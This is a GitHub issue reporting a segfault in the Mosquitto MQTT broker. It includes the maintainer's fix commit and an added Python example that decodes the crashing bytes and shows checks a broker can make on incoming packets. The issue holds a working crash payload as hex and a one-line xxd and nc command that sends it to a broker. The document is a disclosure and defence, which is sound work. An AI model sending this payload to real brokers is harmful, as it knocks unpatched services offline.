
Segmentation Fault #2163

Closed
PBearson opened this issue Apr 3, 2021 · 1 comment

PBearson commented Apr 3, 2021

I was doing some fuzz testing and came across this bug that crashes Mosquitto (confirmed in 2.0.9 and 2.0.7). When a client sends a valid CONNECT packet followed by a malformed CONNACK packet, sometimes it crashes the broker due to a segmentation fault.

The payload: 101000044d5154540502003c03210014000029020001e000

How to replicate:
echo 101000044d5154540502003c03210014000029020001e000 | xxd -p -r | nc <host> <port>

Proof:

Segfault: (screenshot)

GDB info: (screenshot)

I can generate other payloads which trigger the same crash, in case they are needed. Let me know.

ralight (Contributor) commented Apr 3, 2021

Thanks for the fuzzing and the report, I've just pushed a change to fix this and will be making a new release today.

ralight closed this as completed Apr 3, 2021
ralight added a commit that referenced this issue Apr 3, 2021
CVE-xxxx-xxxx: If an authenticated client connected with MQTT v5 sent a
malformed CONNACK message to the broker a NULL pointer dereference occurred,
most likely resulting in a segfault. This will be updated with the CVE
number when it is assigned.
Affects versions 2.0.0 to 2.0.9 inclusive.

Closes #2163. Thanks to Bryan Pearson.
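The report above has a client sending a CONNACK, a packet that only ever flows from broker to client, and the fix commit describes the NULL pointer dereference that followed. As an added illustration that is not part of this issue or of Mosquitto's source, the Python below decodes the reported byte string into its three control packets and applies the checks a broker's fixed-header parser can make before touching any per-connection state: the packet type must be one a client is allowed to send, and the reserved flag nibble must match the spec. The payload bytes are the ones from the report; the function names, verdict strings and the lookup tables are constructed for this example.

```python
"""Added example (not Mosquitto code): decode an MQTT client byte stream and
flag control packets a broker should reject before any further processing."""
import struct

# Control packet type numbers from the MQTT fixed header (upper 4 bits of byte 0).
PACKET_NAMES = {
    1: "CONNECT", 2: "CONNACK", 3: "PUBLISH", 4: "PUBACK", 5: "PUBREC",
    6: "PUBREL", 7: "PUBCOMP", 8: "SUBSCRIBE", 9: "SUBACK", 10: "UNSUBSCRIBE",
    11: "UNSUBACK", 12: "PINGREQ", 13: "PINGRESP", 14: "DISCONNECT", 15: "AUTH",
}

# Packet types the MQTT v5 spec defines as server-to-client only; a broker
# never has a legitimate reason to accept them from a client.
SERVER_ONLY = {2, 9, 11, 13}

# Fixed-header flag nibble the spec reserves per type (PUBLISH is excluded
# because its flags carry DUP/QoS/RETAIN and are validated separately).
REQUIRED_FLAGS = {1: 0, 2: 0, 4: 0, 5: 0, 6: 2, 7: 0, 8: 2, 9: 0,
                  10: 2, 11: 0, 12: 0, 13: 0, 14: 0, 15: 0}

# Constructed from the hex string in the report: CONNECT, CONNACK, DISCONNECT.
REPORTED_PAYLOAD = bytes.fromhex("101000044d5154540502003c03210014000029020001e000")


def decode_remaining_length(data, offset):
    """MQTT variable byte integer: 7 data bits per byte, MSB set = continue,
    at most 4 bytes. Returns (value, offset just after the integer)."""
    value, multiplier = 0, 1
    for i in range(4):
        if offset + i >= len(data):
            raise ValueError("truncated remaining length")
        byte = data[offset + i]
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:
            return value, offset + i + 1
        multiplier *= 128
    raise ValueError("malformed remaining length (more than 4 bytes)")


def split_packets(stream):
    """Yield (type, flags, body) for each control packet in a byte stream,
    refusing to read past the end of the buffer."""
    offset = 0
    while offset < len(stream):
        ptype, flags = stream[offset] >> 4, stream[offset] & 0x0F
        length, offset = decode_remaining_length(stream, offset + 1)
        body = stream[offset:offset + length]
        if len(body) < length:
            raise ValueError("truncated packet body")
        offset += length
        yield ptype, flags, body


def connect_protocol(body):
    """Return (protocol name, protocol level) from a CONNECT variable header."""
    (name_len,) = struct.unpack(">H", body[:2])
    name = body[2:2 + name_len].decode("ascii")
    level = body[2 + name_len]  # 5 means MQTT v5, as in the report
    return name, level


def broker_verdict(ptype, flags):
    """Decide, from the fixed header alone, whether a broker may process the packet."""
    if ptype not in PACKET_NAMES:
        return "reject: reserved packet type"
    if ptype in SERVER_ONLY:
        return "reject: server-to-client packet type sent by a client"
    if ptype in REQUIRED_FLAGS and flags != REQUIRED_FLAGS[ptype]:
        return "reject: reserved flag bits set"
    return "accept"


def check_client_stream(stream):
    """Return [(packet name, verdict), ...] for every packet in the stream."""
    return [(PACKET_NAMES.get(ptype, "RESERVED"), broker_verdict(ptype, flags))
            for ptype, flags, _ in split_packets(stream)]


if __name__ == "__main__":
    for name, verdict in check_client_stream(REPORTED_PAYLOAD):
        print(f"{name:<10} {verdict}")
```

Run as a script, the reported payload decodes to a well-formed CONNECT (protocol "MQTT", level 5), a CONNACK whose fixed header also has reserved flag bits set (0x29), and a trailing DISCONNECT; the CONNACK is rejected on the direction check alone, before its too-short body would ever be parsed. A direction check this early is cheap and removes a whole class of "packet type the server-side code never expected" paths from the attack surface.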
@github-actions github-actions bot locked as resolved and limited conversation to collaborators Aug 11, 2022